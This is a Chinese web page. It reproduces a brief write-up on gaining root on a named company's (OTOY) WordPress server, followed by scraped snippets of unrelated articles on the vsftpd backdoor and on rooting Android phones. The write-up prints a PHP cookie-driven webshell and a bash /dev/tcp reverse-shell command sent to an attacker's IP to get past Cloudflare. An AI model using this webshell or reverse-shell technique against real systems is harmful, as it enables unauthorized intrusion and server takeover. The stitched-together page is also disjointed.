如何获取OTOY服务器root权限的

0x1:    获取账户密码

注入获取帐号密码登录wordpress网站后台(略过).

0x2:    上传webshell

1.Media Uploader: wordpress新版本中很长时间都不可用.

 2.Themes Editor: 没有写入权限.

3.Plugin Editor:    插件编辑无法激活

There was something called (inactive files) for Plugins files, If you tried to edit a file of the plugin, Only the plugin main file will be on active mode, all other files will be marked as Inactive mode, and If you edited the main file, The plugin will be deactivated and then you’ll not be able to see it on plugins again.

4.寻找现有插件的漏洞

0x3:    绕过插件限制上传webshell

plugin-editor.php?file=index.php&plugin=index.php

0x4:    反弹shell

反弹被Cloudflare防火墙拦截

nc -l -vvv -p 443
bash -i >& /dev/tcp/$myip/443 0>&1

0x5:    绕过Cloudflare防火墙反弹shell

通过cookies来传递执行的命令请求

<?php
system($_COOKIE[‘cmd’]);
Cookie: cmd=bash -i >& /dev/tcp/$myip/443 0>&1

0x6:    Done ;)

原文链接:http://pwnrules.com/otoy-server-rooted/

时间: 2024-10-06 04:56:42

如何获取OTOY服务器root权限的的相关文章

metasploit获取vsftp服务器root权限

vsftpd version 2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限.这 里用backtrack 集成的metasploit做测试,metasploit集成了各种各样的漏洞,我们可以在上面利用服务器.个人PC和应用程序的漏洞.开始菜单路径 backtrack/Exploitation tools/Network Exploitation tools/Metaspolit Framework/msfconsole, 用metaspolit内置的nmap进行主机扫描 nma

关于获取小米手机root权限的问题

adb shell -> cd data->ls 提示:结果提示了adb opendir failed ,permission denied android的data目录是一个安装apk的分区,user用户无法直接操作,只有获得root权限才可以操作,获得root权限的步骤: 1.在手机上安装qq权限管理的kingroot工具,然后开启root权限 2.终端 adb shell -cd data-su 3.在手机上有提示是否开启root模式,点击ok 下载就可以查看data目录下的文件了 和l

三星Galaxy s4(i9505)完美获取root权限教程

三星Galaxy s4(i9505)完美获取root权限教程 论坛上贴吧上关于三星s4 i9505 root的介绍有很多,方法多种多样,今天小编来介绍一种使用root软件来实现三星i9505一键root的方法.这篇三星Galaxy s4(i9505)获取root教程仅仅三个步骤,借助完美ROOT工具来完成全部操作,方便快捷,废话不多说,请看i9505 root教程内容! 三星s4 i9505 root操作从准备工作开始,首先点击下载完美ROOT安装软件,其次检查手机保持开机,电量充足在50%以上

Android 获取 root权限

在进行android 开发的时候,经常用真机进行调试,有时候需要把手机中的sqlite数据复制出来.这时候就需要获取手机的root权限.通过 adb shell 命令可以获取权限. 1. 运行cmd 通过cd命令到android sdk/tools目录,输入adb shell 输入 su 输入chmod -R 777 /data/xxx.xxx.xx  即可

静默安装/ 普通安装与root权限获取相关

静默安装 有时候使用第三方的插件时我们需要静默安装其提供的apk包,静默安装时我们需要获取root权限,如下代码 Process process = Runtime.getRuntime().exec("su"); 然后此时获取到的root权限不是整个个应用的,而是Process这个进程 所以此时要进行的root权限相关的操作,就必须通过Process这个进程来获取 ps:file为sd卡中的文件File类型 如下 DataOutputStream dataOutputStream =

Linux su和sudo命令的区别,并获得root权限

su(superuser) su表示切换用户,如: 输入:su命令后回车表示切换当前的用户到root用户,或者: 输入:su - root(或者其他用户名)这里加了"-"后表示也切换的当前的环境变量到新用户的环境变量. su root(或者其他用户名)表示不切换环境变量到当前用户下. sudo 表示获取临时的root权限命令,如: sudo gedit /etc/shadow,表示临时使用root权限来编辑/etc/shadow密码文件,因为/etc/shadow密码文件需要使用roo

闲聊ROOT权限——ROOT权限的前世今生

最近工作一直很忙,竟然慢慢地疏远了CSDN的博客,然而在工作中遇到问题,又会被多次的引导至CSDN,故笔者抽空也将自己学习的成果与大家分享在这里,希望能帮助到需要帮助的人. 本文将从几个方面,由浅至深地讲述ROOT到底是什么东西? 一. ROOT权限简单介绍 二.为什么需要ROOT 三. ADBD的ROOT权限 四.深入源代码 ROOT权限简介: ROOT权限是Linux内核中的最高权限,如果你的身份是ROOT,那么你就具有了ROOT权限.有了最高权限,你就可以为所欲为,换句话说,如果恶意程序获

三星Galaxy s4(i9505)得到完美root权限教程

三星Galaxy s4(i9505)完美获取root权限教程 论坛上贴吧上关于三星s4 i9505 root的介绍有非常多,方法多种多样.今天小编来介绍一种使用root软件来实现三星i9505一键root的方法. 这篇三星Galaxy s4(i9505)获取root教程只三个步骤,借助完美ROOT工具来完毕所有操作,方便快捷,废话不多说.请看i9505 root教程内容! 三星s4 i9505 root操作从准备工作開始.首先点击下载完美ROOT安装软件,其次检查手机保持开机.电量充足在50%以

Genymotion刷入谷歌应用市场以及获取root权限

Genymotion刷入谷歌应用市场以及获取root权限 - 推酷http://www.tuicool.com/articles/rEV3aa6 刷入gapp, arm框架,supersu的包要注意,这些包所在的路径不能含有中文!!! 另外必须刷对的包 教程(包括我之前翻译的一篇 Genymotion简单教程及问题解决 ),但是大多数都已经没法用了.根据那些教程安装上的google play store,经常会弹出“已停止服务”的窗口. 其实最关键的点是,要刷对google apps packa